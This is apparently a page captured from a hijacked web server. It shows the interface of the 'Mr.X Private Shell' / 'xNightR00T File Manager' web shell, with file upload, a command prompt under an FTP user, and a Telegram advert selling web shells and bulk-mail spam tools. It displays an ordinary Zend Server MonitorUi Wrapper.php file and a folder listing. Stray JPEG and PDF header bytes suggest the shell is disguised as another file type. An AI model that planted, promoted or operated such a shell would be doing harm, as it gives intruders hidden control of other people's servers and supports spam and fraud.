xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace MonitorUi;

use ZendServer\Exception,
    ZendServer\Log\Log;

class Wrapper
{
    const DEFAULT_LIMIT  = -1;
    const DEFAULT_OFFSET = 0;

    /**
     * @param string $requestUid
     * @param string $debug
     * @param string $amf
     * @return array
     * @throws ZwasComponents_MonitorUi_Api_Exception
     */
    public function getRequestSummary($requestUid, $debug = null, $amf = null)
    {
        try {
            return zend_monitor_ui_get_request_summary_2($requestUid);
        } catch (ZendMonitorUIException $e) {
            switch ($e->getCode()) {
                case ZM_EXCEPTION_DB_ERROR:
                    $message = _t('The Zend Monitor failed to access the issues database');
                    break;
                default:
                    $message = _t('The Zend Monitor failed to retrieve issues information');
            }
            throw new Exception($message, 0, $e);
        }
    }

    /**
     * @param string $requestUid
     * @throws ZendServer\Exception
     */
    public function prepareRequestTrace($requestUid)
    {
        try {
            return zend_monitor_ui_prepare_request_trace($requestUid);
        } catch (\ZendMonitorUiException $e) {
            Log::err('Could not prepare request trace', $e);
            switch ($e->getCode()) {
                case ZM_EXCEPTION_DB_ERROR:
                    $message = _t('The Zend Monitor failed to access the issues database');
                    throw new Exception($message, 0, $e);
                    break;
                default:
                    $message = _t('The Zend Monitor failed to retrieve issues information');
                    throw new Exception($message, 0, $e);
            }
        }
    }

    /**
     * @param array $where
     * @return integer
     * @throws ZendServer\Exception
     */
    public function getIssuesCount(array $where)
    {
        try {
            return zend_monitor_get_issues_count($where);
        } catch (\ZendMonitorUiException $e) {
            Log::err('Failed to retrieve issues');
            Log::debug($e);
            throw new Exception('The \'monitor_ui\' extension failed to count issues', 0, $e);
        }
    }

    /**
     * @param array $issuesIds
     * @throws Exception
     */
    public function deleteIssues(array $issuesIds)
    {
        try {
            $zDeleted = 0; // value will be overwritten by zend_monitor_change_issues_status()
            Log::debug('calling zend_monitor_change_issues_status with DELETED, against '.count($issuesIds).' issues');
            if (!empty($issuesIds) && zend_monitor_change_issues_status($issuesIds, ZM_STATUS_DELETED, $zDeleted) === false) {
                throw new Exception("deleteIssues() has failed to execute");
            }

            return $zDeleted;
        } catch (\ZendMonitorUiException $e) {
            $msg = 'monitor_ui extension failed to delete issues using zend_monitor_change_issues_status()';
            Log::err($msg);
            Log::debug($e);
            throw new Exception($msg, 0, $e);
        }
    }

    /**
     * @param array $where
     * @throws Exception
     */
    public function deleteIssuesByFilter(array $where)
    {
        try {
            $issuesIds = zend_monitor_get_issues_ids($where);
            return $this->deleteIssues($issuesIds);
        } catch (\ZendMonitorUiException $e) {
            $msg = 'monitor_ui extension failed to delete issues using zend_monitor_change_issues_status()';
            Log::err($msg);
            Log::debug($e);
            throw new Exception($msg, 0, $e);
        }
    }

    /**
     * @param array $tracePaths
     * @throws Exception
     */
    public function deleteTraceData(array $tracePaths)
    {
        try {
            return zend_monitor_delete_tracing_data($tracePaths);
        } catch (\ZendMonitorUiException $e) {
            $msg = 'monitor_ui extension failed to delete trace data using zend_monitor_delete_tracing_data()';
            Log::err($msg);
            Log::debug($e);
            throw new Exception($msg, 0, $e);
        }
    }

    /**
     * @param array $where
     * @param array $limit
     * @param array $sort
     * @return array
     * @throws ZendServer\Exception
     */
    public function getIssues(array $where, array $limit = array(), array $sort = array())
    {
        try {
            return zend_monitor_get_issues($where, $limit, $sort);
        } catch (\ZendMonitorUiException $e) {
            Log::err('error in getIssues'.$e->getMessage());
            throw new Exception('The \'monitor_ui\' extension failed to retrieve issues', 0, $e);
        }
    }

    /**
     * @param array $issueIds
     * @throws Exception
     */
    public function getIssuesLastEventGroupData(array $issueIds = array())
    {
        try {
            return zend_monitor_get_issues_last_event_group_data($issueIds);
        } catch (\ZendMonitorUiException $e) {
            Log::err('ZendMonitorUiException: '.$e);
            throw new Exception('The \'monitor_ui\' extension failed to retrieve issues last group data', 0, $e);
        }
    }

    /**
     * @param int $issueId
     * @return array
     * @throws ZendServer\Exception
     */
    public function getIssueData($issueId)
    {
        try {
            return zend_monitor_get_issue_data($issueId);
        } catch (\ZendMonitorUiException $e) {
            Log::err('Failed to retrieve issue data');
            Log::debug($e);
            throw new Exception('The \'monitor_ui\' extension failed to retrieve issue data', 0, $e);
        }
    }

    /**
     * @param int $issueId
     * @param int $limit
     * @return array
     * @throws ZendServer\Exception
     */
    public function getIssueEventGroups($issueId, $limit = self::DEFAULT_LIMIT, $offset = self::DEFAULT_OFFSET)
    {
        try {
            return zend_monitor_get_issue_event_groups($issueId, $limit);
        } catch (\ZendMonitorUiException $e) {
            Log::err('Failed to retrieve event groups');
            Log::debug($e);
            throw new Exception('The \'monitor_ui\' extension failed to retrieve event groups', 0, $e);
        }
    }

    /**
     * @param int $groupId
     * @return array
     * @throws ZendServer\Exception
     */
    public function getEventGroupData($groupId)
    {
        try {
            return zend_monitor_get_event_group_data($groupId);
        } catch (\ZendMonitorUiException $e) {
            Log::err($e);
            Log::debug('Failed to retrieve event group data');
            throw new Exception('The \'monitor_ui\' extension failed to retrieve event group data', 0, $e);
        }
    }
}

Filemanager

Name Type Size Permission Actions
Filter Folder 0755
Model Folder 0755
Wrapper.php File 6.54 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1